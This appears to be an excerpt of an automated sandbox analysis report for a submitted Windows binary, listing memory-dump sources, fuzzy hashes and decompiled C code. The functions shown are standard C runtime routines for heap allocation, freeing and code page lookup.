                                                                                                                                                                          0x009f7c6d
                                                                                                                                                                          0x009f7c6d
                                                                                                                                                                          0x009f7c70
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f7c73
                                                                                                                                                                          0x009f7c73
                                                                                                                                                                          0x009f7c76
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f7c78
                                                                                                                                                                          0x009f7c7b
                                                                                                                                                                          0x009f7c7e
                                                                                                                                                                          0x009f7c7e
                                                                                                                                                                          0x009f7c85
                                                                                                                                                                          0x009f7c87
                                                                                                                                                                          0x009f7c89
                                                                                                                                                                          0x009f7c89
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f7c87
                                                                                                                                                                          0x009f7c31
                                                                                                                                                                          0x009f7c34
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f7c34
                                                                                                                                                                          0x009f7bf2
                                                                                                                                                                          0x009f7bf5
                                                                                                                                                                          0x009f7bf7
                                                                                                                                                                          0x009f7bfa
                                                                                                                                                                          0x009f7bfc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f7c01
                                                                                                                                                                          0x009f7c03
                                                                                                                                                                          0x009f7c06
                                                                                                                                                                          0x009f7c0b
                                                                                                                                                                          0x009f7c0d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f7c0d
                                                                                                                                                                          0x009f7be1
                                                                                                                                                                          0x00000000

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9def4cabaac92a5c04ff8bede4439397f491c65078068b2ce9f34c27cbf4c726
                                                                                                                                                                          • Instruction ID: 90ebec136d1cd8d5d738ce12c6bad4eca409527a22da8e1b958b3f4a44c60dc0
                                                                                                                                                                          • Opcode Fuzzy Hash: 9def4cabaac92a5c04ff8bede4439397f491c65078068b2ce9f34c27cbf4c726
                                                                                                                                                                          • Instruction Fuzzy Hash: E731503290451EAFCB15CFE9C8809FDF7B9BF19320B14466AE652A3790D731E954CBA0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A05D2E Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                          			E00A05D2E(void* __eflags, intOrPtr* _a4) {
				void* _t14;
				void* _t15;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr _t30;
				intOrPtr* _t31;
				intOrPtr* _t32;

				_t32 = _a4;
				if(E00A05CF3(__eflags, _t32) == 0) {
					L11:
					__eflags = 0;
					return 0;
				}
				_t14 = E009FEC86(1);
				_t23 = 2;
				if(_t32 != _t14) {
					_t15 = E009FEC86(_t23);
					__eflags = _t32 - _t15;
					if(_t32 != _t15) {
						goto L11;
					}
					_t31 = 0xa46520;
					L5:
					 *0xa4639c =  *0xa4639c + 1;
					if(( *(_t32 + 0xc) & 0x000004c0) != 0) {
						goto L11;
					}
					asm("lock or [ecx], eax");
					_t18 =  *_t31;
					if(_t18 != 0) {
						L10:
						 *((intOrPtr*)(_t32 + 4)) = _t18;
						 *_t32 =  *_t31;
						 *((intOrPtr*)(_t32 + 8)) = 0x1000;
						 *((intOrPtr*)(_t32 + 0x18)) = 0x1000;
						L9:
						return 1;
					}
					_t21 = E00A04E1F(0x1000); // executed
					 *_t31 = _t21;
					E00A0447F(0);
					_t18 =  *_t31;
					if(_t18 != 0) {
						goto L10;
					}
					_t30 = _t32 + 0x14;
					 *((intOrPtr*)(_t32 + 8)) = _t23;
					 *((intOrPtr*)(_t32 + 4)) = _t30;
					 *_t32 = _t30;
					 *((intOrPtr*)(_t32 + 0x18)) = _t23;
					goto L9;
				}
				_t31 = 0xa4651c;
				goto L5;
			}











                                                                                                                                                                          0x00a05d35
                                                                                                                                                                          0x00a05d42
                                                                                                                                                                          0x00a05dd3
                                                                                                                                                                          0x00a05dd3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a05dd3
                                                                                                                                                                          0x00a05d4a
                                                                                                                                                                          0x00a05d52
                                                                                                                                                                          0x00a05d55
                                                                                                                                                                          0x00a05d5f
                                                                                                                                                                          0x00a05d65
                                                                                                                                                                          0x00a05d67
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a05d69
                                                                                                                                                                          0x00a05d6e
                                                                                                                                                                          0x00a05d6e
                                                                                                                                                                          0x00a05d7f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a05d86
                                                                                                                                                                          0x00a05d89
                                                                                                                                                                          0x00a05d8d
                                                                                                                                                                          0x00a05dbc
                                                                                                                                                                          0x00a05dbc
                                                                                                                                                                          0x00a05dc1
                                                                                                                                                                          0x00a05dc3
                                                                                                                                                                          0x00a05dca
                                                                                                                                                                          0x00a05db8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a05db8
                                                                                                                                                                          0x00a05d94
                                                                                                                                                                          0x00a05d9b
                                                                                                                                                                          0x00a05d9d
                                                                                                                                                                          0x00a05da2
                                                                                                                                                                          0x00a05da8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a05daa
                                                                                                                                                                          0x00a05dad
                                                                                                                                                                          0x00a05db0
                                                                                                                                                                          0x00a05db3
                                                                                                                                                                          0x00a05db5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a05db5
                                                                                                                                                                          0x00a05d57
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                          • Opcode ID: e06ac56deda196afb5a468449340fca8a1d50979b5d1e01db0d787aa12aac30b
                                                                                                                                                                          • Instruction ID: 2405da5c1e19330d4e486d9384155240d18f4735ef07b244877fc2aa4e26215a
                                                                                                                                                                          • Opcode Fuzzy Hash: e06ac56deda196afb5a468449340fca8a1d50979b5d1e01db0d787aa12aac30b
                                                                                                                                                                          • Instruction Fuzzy Hash: 5F11E2B5901B0A8FE730DF29E445B93B7E4EB45364B30441EE5898B2D1E771A9818F91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0C8FB Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                          			E00A0C8FB(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E00A04422(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E00A065B4(__eflags, _t4, 0xfa0, 0);
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *(_t32 + 0xd) =  *(_t32 + 0xd) & 0x000000f8;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E00A0447F(0);
				return _t35;
			}









                                                                                                                                                                          0x00a0c901
                                                                                                                                                                          0x00a0c908
                                                                                                                                                                          0x00a0c90d
                                                                                                                                                                          0x00a0c911
                                                                                                                                                                          0x00a0c918
                                                                                                                                                                          0x00a0c91e
                                                                                                                                                                          0x00a0c91e
                                                                                                                                                                          0x00a0c924
                                                                                                                                                                          0x00a0c926
                                                                                                                                                                          0x00a0c929
                                                                                                                                                                          0x00a0c929
                                                                                                                                                                          0x00a0c92c
                                                                                                                                                                          0x00a0c92e
                                                                                                                                                                          0x00a0c934
                                                                                                                                                                          0x00a0c938
                                                                                                                                                                          0x00a0c93d
                                                                                                                                                                          0x00a0c941
                                                                                                                                                                          0x00a0c945
                                                                                                                                                                          0x00a0c947
                                                                                                                                                                          0x00a0c94a
                                                                                                                                                                          0x00a0c950
                                                                                                                                                                          0x00a0c957
                                                                                                                                                                          0x00a0c95b
                                                                                                                                                                          0x00a0c95e
                                                                                                                                                                          0x00a0c961
                                                                                                                                                                          0x00a0c961
                                                                                                                                                                          0x00a0c965
                                                                                                                                                                          0x00a0c968
                                                                                                                                                                          0x00a0c91a
                                                                                                                                                                          0x00a0c91a
                                                                                                                                                                          0x00a0c91a
                                                                                                                                                                          0x00a0c96a
                                                                                                                                                                          0x00a0c975

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A04422: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00A04372,00000001,00000364,00000002,000000FF,?,009F9867,00000002,00000000,?,?), ref: 00A04463
                                                                                                                                                                          • _free.LIBCMT ref: 00A0C96A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 614378929-0
                                                                                                                                                                          • Opcode ID: 145c6e0921bfc9117c878aa01b5bf3b91fc33d0e9c842e9414a8e9ccfea7abd0
                                                                                                                                                                          • Instruction ID: 43b4980ae88c57172fe0034ec6cadc3b1557e5ce94de763a40f9001b991dd4ec
                                                                                                                                                                          • Opcode Fuzzy Hash: 145c6e0921bfc9117c878aa01b5bf3b91fc33d0e9c842e9414a8e9ccfea7abd0
                                                                                                                                                                          • Instruction Fuzzy Hash: 62016D7260431A6BC3318F68E881989FB98FB087F0F150329E695B76C0E3706C15C7A0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A019E9 Relevance: 1.5, APIs: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                          			E00A019E9(void* __ebx, intOrPtr* __ecx, void* __eflags) {
				void* _v5;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t16;
				void* _t17;
				char _t23;
				void* _t27;
				intOrPtr* _t32;
				intOrPtr _t33;

				_t32 = __ecx;
				_t16 = E00A04422(1, 0xb8);
				_t31 =  *_t32;
				_t33 = _t16;
				 *((intOrPtr*)( *_t32)) = _t33;
				_t17 = E00A0447F(0);
				_t37 = _t33;
				if(_t33 != 0) {
					_v36 =  *_t32;
					_v32 =  *((intOrPtr*)(_t32 + 4));
					_v28 =  *((intOrPtr*)(_t32 + 8));
					_v24 =  *((intOrPtr*)(_t32 + 0xc));
					_v20 =  *((intOrPtr*)(_t32 + 0x10));
					_t23 = 4;
					_v12 = _t23;
					_v16 = _t23;
					_push( &_v12);
					_push( &_v36);
					_push( &_v16); // executed
					_t27 = E00A0186F(__ebx, _t31, _t32, _t33, _t37); // executed
					return _t27;
				}
				return _t17;
			}




















                                                                                                                                                                          0x00a019fa
                                                                                                                                                                          0x00a019fc
                                                                                                                                                                          0x00a01a01
                                                                                                                                                                          0x00a01a03
                                                                                                                                                                          0x00a01a07
                                                                                                                                                                          0x00a01a09
                                                                                                                                                                          0x00a01a11
                                                                                                                                                                          0x00a01a13
                                                                                                                                                                          0x00a01a1a
                                                                                                                                                                          0x00a01a20
                                                                                                                                                                          0x00a01a26
                                                                                                                                                                          0x00a01a2c
                                                                                                                                                                          0x00a01a34
                                                                                                                                                                          0x00a01a37
                                                                                                                                                                          0x00a01a38
                                                                                                                                                                          0x00a01a3b
                                                                                                                                                                          0x00a01a41
                                                                                                                                                                          0x00a01a45
                                                                                                                                                                          0x00a01a49
                                                                                                                                                                          0x00a01a4a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a01a4a
                                                                                                                                                                          0x00a01a52

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A04422: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00A04372,00000001,00000364,00000002,000000FF,?,009F9867,00000002,00000000,?,?), ref: 00A04463
                                                                                                                                                                          • _free.LIBCMT ref: 00A01A09
                                                                                                                                                                            • Part of subcall function 00A0447F: HeapFree.KERNEL32(00000000,00000000,?,00A0D2F5,?,00000000,?,00000002,?,00A0D598,?,00000007,?,?,00A0DA8B,?), ref: 00A04495
                                                                                                                                                                            • Part of subcall function 00A0447F: GetLastError.KERNEL32(?,?,00A0D2F5,?,00000000,?,00000002,?,00A0D598,?,00000007,?,?,00A0DA8B,?,?), ref: 00A044A7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Heap$AllocateErrorFreeLast_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 314386986-0
                                                                                                                                                                          • Opcode ID: 460640cc4ccadc4d4efe945c394a9b6c0b1e8e0748f345c44761251f25e0e097
                                                                                                                                                                          • Instruction ID: c6b5345e234620c609fc7f9cae221abf22f86084d26872a5857ebb45d97012e0
                                                                                                                                                                          • Opcode Fuzzy Hash: 460640cc4ccadc4d4efe945c394a9b6c0b1e8e0748f345c44761251f25e0e097
                                                                                                                                                                          • Instruction Fuzzy Hash: B001DEB6E00219AFCB10DFA9D541BDEBBF8FB48710F104166EA14E7280E775AA55CBD0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A04422 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00A04422(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0xa46904, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00A02F97();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E009FEBAB(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E00A00CAC(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}







                                                                                                                                                                          0x00a04428
                                                                                                                                                                          0x00a0442d
                                                                                                                                                                          0x00a0443b
                                                                                                                                                                          0x00a0443b
                                                                                                                                                                          0x00a04441
                                                                                                                                                                          0x00a04443
                                                                                                                                                                          0x00a04443
                                                                                                                                                                          0x00a0445a
                                                                                                                                                                          0x00a04463
                                                                                                                                                                          0x00a0446b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0444b
                                                                                                                                                                          0x00a0444d
                                                                                                                                                                          0x00a0446f
                                                                                                                                                                          0x00a04474
                                                                                                                                                                          0x00a0447a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0447a
                                                                                                                                                                          0x00a04456
                                                                                                                                                                          0x00a04458
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a04458
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0445a
                                                                                                                                                                          0x00a04433
                                                                                                                                                                          0x00a04439
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00A04372,00000001,00000364,00000002,000000FF,?,009F9867,00000002,00000000,?,?), ref: 00A04463
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                          • Opcode ID: 6a87ba0bca01268278e0a8beac02710cd66ff12bddc9992c16529225a227a8c2
                                                                                                                                                                          • Instruction ID: 267900ba39d8c3df490a048febb0055dfc92fc3ac62e3df88b97825182ef5aa4
                                                                                                                                                                          • Opcode Fuzzy Hash: 6a87ba0bca01268278e0a8beac02710cd66ff12bddc9992c16529225a227a8c2
                                                                                                                                                                          • Instruction Fuzzy Hash: 8CF0B47150022CA7EF219FA2BD45B5A3758BBC9B60B148111EA55A61D1CB32D80182A1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A04E1F Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00A04E1F(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E009FEBAB(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xa46904, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00A02F97();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E00A00CAC(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}





                                                                                                                                                                          0x00a04e25
                                                                                                                                                                          0x00a04e2b
                                                                                                                                                                          0x00a04e5d
                                                                                                                                                                          0x00a04e62
                                                                                                                                                                          0x00a04e68
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a04e68
                                                                                                                                                                          0x00a04e2f
                                                                                                                                                                          0x00a04e31
                                                                                                                                                                          0x00a04e31
                                                                                                                                                                          0x00a04e48
                                                                                                                                                                          0x00a04e51
                                                                                                                                                                          0x00a04e59
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a04e39
                                                                                                                                                                          0x00a04e3b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a04e44
                                                                                                                                                                          0x00a04e46
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a04e46
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,009F9867,00000002,00000000,?,?,?,009F1D1E,00000001,00000004), ref: 00A04E51
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                          • Opcode ID: 87d1d8af3fd9d718ed2420d8cb809b7df57a3ee6c3a7bfaae8a6264bd4d8db21
                                                                                                                                                                          • Instruction ID: f15e55891e58ca25958c77555cd591323457e2a7b23410dab09e97a6f5b2dc22
                                                                                                                                                                          • Opcode Fuzzy Hash: 87d1d8af3fd9d718ed2420d8cb809b7df57a3ee6c3a7bfaae8a6264bd4d8db21
                                                                                                                                                                          • Instruction Fuzzy Hash: B2E0E57550131C9AE6213BA6FD05FEB7759BBCBBE0F054120EF11920D0CB20DC0182A1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 00A0E30D Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                          			E00A0E30D(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t77;
				intOrPtr* _t84;
				short* _t86;
				void* _t88;
				intOrPtr* _t91;
				intOrPtr* _t95;
				short _t113;
				void* _t114;
				intOrPtr* _t116;
				intOrPtr _t119;
				signed int* _t120;
				void* _t121;
				intOrPtr* _t123;
				signed short _t125;
				int _t127;
				void* _t128;
				void* _t131;
				signed int _t132;

				_push(__ecx);
				_push(__ecx);
				_t84 = _a4;
				_t33 = E00A041D0(__ecx, __edx);
				_t113 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t123 = _t3;
				_t4 = _t123 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t123 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t123 + 4; // 0x54
				_t116 = _t6;
				_v8 = _t34;
				_t91 = _t84;
				_t35 = _t84 + 0x80;
				 *_t123 = _t84;
				 *_t116 = _t35;
				if( *_t35 != 0) {
					E00A0E2A0(0xa19090, 0x16, _t116);
					_t91 =  *_t123;
					_t131 = _t131 + 0xc;
					_t113 = 0;
				}
				_push(_t123);
				if( *_t91 == _t113) {
					E00A0DC11(_t84, _t91);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t116)) == _t113) {
						E00A0DD31();
					} else {
						E00A0DC98(_t91);
					}
					if( *((intOrPtr*)(_t123 + 8)) == 0) {
						_t77 = E00A0E2A0(0xa18d80, 0x40, _t123);
						_t131 = _t131 + 0xc;
						if(_t77 != 0) {
							_push(_t123);
							if( *((intOrPtr*)( *_t116)) == 0) {
								E00A0DD31();
							} else {
								E00A0DC98(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t123 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t84 + 0x100;
					if( *_t84 != 0 ||  *_t38 != 0) {
						_t39 = E00A0E15D(_t38, _t123);
					} else {
						_t39 = GetACP();
					}
					_t125 = _t39;
					if(_t125 == 0 || _t125 == 0xfde8 || IsValidCodePage(_t125 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t125;
						}
						_t119 = _a12;
						if(_t119 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t95 = _v8;
							_t15 = _t119 + 0x120; // 0xd0
							_t86 = _t15;
							 *_t86 = 0;
							_t16 = _t95 + 2; // 0x6
							_t114 = _t16;
							do {
								_t45 =  *_t95;
								_t95 = _t95 + 2;
							} while (_t45 != _v12);
							_t18 = (_t95 - _t114 >> 1) + 1; // 0x3
							_t47 = E00A0B4B3(_t86, 0x55, _v8);
							_t132 = _t131 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E009FCBFC();
								asm("int3");
								_t130 = _t132;
								_t50 =  *0xa44bac; // 0x96877b9b
								_v52 = _t50 ^ _t132;
								_push(_t86);
								_push(_t125);
								_push(_t119);
								_t52 = E00A041D0(_t97, _t114);
								_t87 = _t52;
